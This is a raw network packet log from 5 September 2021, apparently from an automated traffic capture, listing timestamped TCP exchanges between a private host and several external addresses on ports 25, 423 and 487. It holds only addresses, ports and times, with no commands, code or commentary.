Sep 5, 2021 15:50:36.829257011 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:36.829406023 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:36.839332104 CEST	423	49989	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:36.845906019 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:36.878871918 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.879748106 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.885777950 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.885878086 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.908058882 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:36.914653063 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.914710045 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.914760113 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.917047977 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.917987108 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.918858051 CEST	49992	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.919563055 CEST	49993	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.920283079 CEST	49994	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.921022892 CEST	49995	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.936157942 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:36.936269045 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:36.940071106 CEST	423	49986	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:36.940150023 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.945913076 CEST	423	49995	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:36.946003914 CEST	49995	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.958213091 CEST	423	49985	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:36.958301067 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.960946083 CEST	423	49994	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:36.961052895 CEST	49994	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.971363068 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.971481085 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.971716881 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.971750021 CEST	423	49995	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:36.971776009 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.971956968 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.971998930 CEST	49995	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.972517014 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:36.985717058 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:36.987263918 CEST	423	49993	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:36.987368107 CEST	49993	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.987493992 CEST	423	49984	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:36.987559080 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.988534927 CEST	423	49983	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:36.988604069 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.994956017 CEST	423	49992	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:36.995065928 CEST	49992	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.996783972 CEST	423	49995	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:37.003388882 CEST	423	49994	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.003613949 CEST	49994	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.007038116 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.007291079 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.013170004 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.017446995 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.027240038 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.039633989 CEST	49988	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.040159941 CEST	49996	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.044404030 CEST	423	49994	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.052862883 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:37.053025007 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:37.055270910 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.056318998 CEST	423	49993	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.061325073 CEST	49993	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.071105957 CEST	423	49992	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.071475983 CEST	423	49988	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.071485996 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:37.071546078 CEST	49988	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.071706057 CEST	49992	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.072392941 CEST	423	49996	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.072518110 CEST	49996	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.076176882 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.084208012 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.100502968 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:37.100553036 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:37.100650072 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:37.104190111 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.105047941 CEST	423	49996	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.108382940 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.109693050 CEST	49996	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.112658978 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.112797022 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.120100021 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:37.129067898 CEST	423	49993	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.142215967 CEST	423	49996	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.147511959 CEST	423	49992	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.174228907 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:37.189912081 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.190016031 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.227528095 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.282836914 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:37.283030987 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:37.289634943 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.298705101 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.298841000 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.298942089 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.298996925 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.299176931 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.299201012 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.299282074 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.299398899 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.376540899 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.376578093 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.376604080 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.381963015 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.414573908 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.416378975 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.416513920 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.416575909 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.416887999 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.430408955 CEST	49989	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:37.441804886 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.443963051 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.492785931 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.496242046 CEST	487	49990	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.499977112 CEST	423	49989	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:37.500072002 CEST	49989	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:37.608875036 CEST	49997	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:37.620312929 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.647841930 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.648423910 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.648437977 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.648504019 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.648621082 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.676625013 CEST	423	49997	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:37.676727057 CEST	49997	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:37.742852926 CEST	49994	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.743706942 CEST	49995	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:37.744452000 CEST	423	49997	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:37.747740030 CEST	49998	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.748641968 CEST	49999	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:37.749104023 CEST	49997	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:37.752028942 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.752064943 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.752161980 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.752208948 CEST	49992	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.752226114 CEST	49993	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.752253056 CEST	49996	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.752686977 CEST	50000	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.753107071 CEST	50001	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.761997938 CEST	50002	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.768764019 CEST	423	49995	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:37.768850088 CEST	49995	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:37.773797035 CEST	423	49999	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:37.773890972 CEST	49999	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:37.779671907 CEST	49991	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:37.784187078 CEST	423	49994	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.784292936 CEST	49994	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.784735918 CEST	423	49996	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.784801960 CEST	49996	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.789176941 CEST	423	49998	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.789262056 CEST	49998	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.792747021 CEST	423	50002	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.792854071 CEST	50002	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.799475908 CEST	423	49999	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:37.799715042 CEST	49999	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:37.807030916 CEST	25	49991	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:37.816180944 CEST	423	49997	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:37.820250034 CEST	423	49993	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.820337057 CEST	49993	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.821450949 CEST	423	50000	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.821573973 CEST	50000	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.822061062 CEST	423	50001	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.822139025 CEST	50001	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.823875904 CEST	423	50002	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.824116945 CEST	50002	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:37.824763060 CEST	423	49999	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:37.827967882 CEST	423	49992	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.828072071 CEST	49992	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.831860065 CEST	423	49998	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.832036972 CEST	49998	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:37.840992928 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:37.854928017 CEST	423	50002	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:37.868103981 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:37.868246078 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:37.873523951 CEST	423	49998	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:37.875361919 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.890767097 CEST	423	50000	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.891043901 CEST	50000	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:37.891366959 CEST	423	50001	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.891593933 CEST	50001	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:37.897139072 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:37.944169044 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:37.944274902 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:37.947940111 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:37.960557938 CEST	423	50000	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:37.960602999 CEST	423	50001	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:37.975027084 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:37.979983091 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.052843094 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.062398911 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.080487967 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.094904900 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.124692917 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.157077074 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.163984060 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.214658022 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.218491077 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.218547106 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.220429897 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:38.238615036 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.238717079 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:38.288949013 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.289057016 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.289321899 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.289428949 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.290066004 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.354175091 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.354387999 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354563951 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354592085 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354600906 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354918003 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354945898 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354950905 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.354960918 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.423823118 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.424788952 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.425417900 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.425870895 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.425909042 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.426037073 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.426238060 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.426457882 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.430382967 CEST	49997	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:38.430423021 CEST	49998	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:38.430958033 CEST	50002	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:38.430964947 CEST	49999	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:38.430979013 CEST	50006	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:38.450412035 CEST	50007	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:38.450867891 CEST	50008	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:38.451277018 CEST	50009	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:38.456336975 CEST	423	49999	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:38.456432104 CEST	49999	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:38.461838961 CEST	423	50002	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:38.461941957 CEST	50002	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:38.472126007 CEST	423	49998	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:38.472248077 CEST	49998	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:38.472541094 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.472682953 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.472749949 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.472845078 CEST	50004	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:38.476177931 CEST	423	50008	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:38.476341009 CEST	50008	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:38.481801033 CEST	423	50009	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:38.481908083 CEST	50009	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:38.492419958 CEST	423	50007	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:38.492547035 CEST	50007	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:38.497941017 CEST	423	49997	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:38.498032093 CEST	49997	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:38.500286102 CEST	423	50006	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:38.500401974 CEST	50006	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:38.501507044 CEST	423	50008	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:38.512587070 CEST	423	50009	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:38.534528971 CEST	423	50007	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:38.541687012 CEST	487	50004	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:38.569649935 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.570127964 CEST	423	50006	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:38.605073929 CEST	50007	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:38.605207920 CEST	50008	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:38.605499029 CEST	50009	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:38.607750893 CEST	50006	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:38.612318039 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.630136967 CEST	423	50008	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:38.635984898 CEST	423	50009	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:38.646202087 CEST	423	50007	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:38.661861897 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:38.677248955 CEST	423	50006	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:38.678476095 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.678536892 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.705696106 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.706254959 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.742988110 CEST	50001	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:38.742990017 CEST	50000	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:38.743617058 CEST	50010	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:38.744196892 CEST	50011	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:38.745079041 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.772224903 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.772258043 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.772293091 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.772320986 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.772346020 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.788243055 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.796458006 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:38.811893940 CEST	423	50000	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:38.812021017 CEST	50000	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:38.812127113 CEST	423	50001	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:38.812210083 CEST	50001	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:38.813079119 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.813190937 CEST	423	50010	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:38.813338995 CEST	50010	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:38.819240093 CEST	423	50011	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:38.819339991 CEST	50011	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:38.881944895 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.881993055 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.882169962 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.883414984 CEST	423	50010	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:38.883725882 CEST	50010	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:38.895319939 CEST	423	50011	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:38.895558119 CEST	50011	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:38.902086973 CEST	50003	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:38.923877954 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:38.929955006 CEST	25	50003	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:38.953701019 CEST	423	50010	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:38.971158028 CEST	423	50011	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:39.018553972 CEST	50005	25	192.168.2.4	172.65.252.97
Sep 5, 2021 15:50:39.024188995 CEST	50006	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:39.024231911 CEST	50007	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:39.024256945 CEST	50008	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:39.024291992 CEST	50009	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:39.026268005 CEST	50012	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:39.030333042 CEST	50014	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:39.030430079 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.030946016 CEST	50015	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:39.050911903 CEST	423	50008	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:39.051117897 CEST	50008	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:39.055911064 CEST	423	50009	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:39.056027889 CEST	50009	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:39.058547020 CEST	423	50015	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:39.058677912 CEST	50015	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:39.061954975 CEST	50016	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:39.066525936 CEST	423	50007	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:39.066673040 CEST	50007	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:39.072572947 CEST	423	50014	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:39.072696924 CEST	50014	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:39.078202963 CEST	25	50005	172.65.252.97	192.168.2.4
Sep 5, 2021 15:50:39.087727070 CEST	423	50015	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:39.095657110 CEST	423	50016	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:39.095700979 CEST	423	50006	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:39.095794916 CEST	50016	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:39.095850945 CEST	50006	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:39.097906113 CEST	423	50012	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:39.097980976 CEST	50012	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:39.102229118 CEST	487	50013	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:39.102313042 CEST	50013	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:39.113919020 CEST	423	50014	95.216.195.92	192.168.2.4
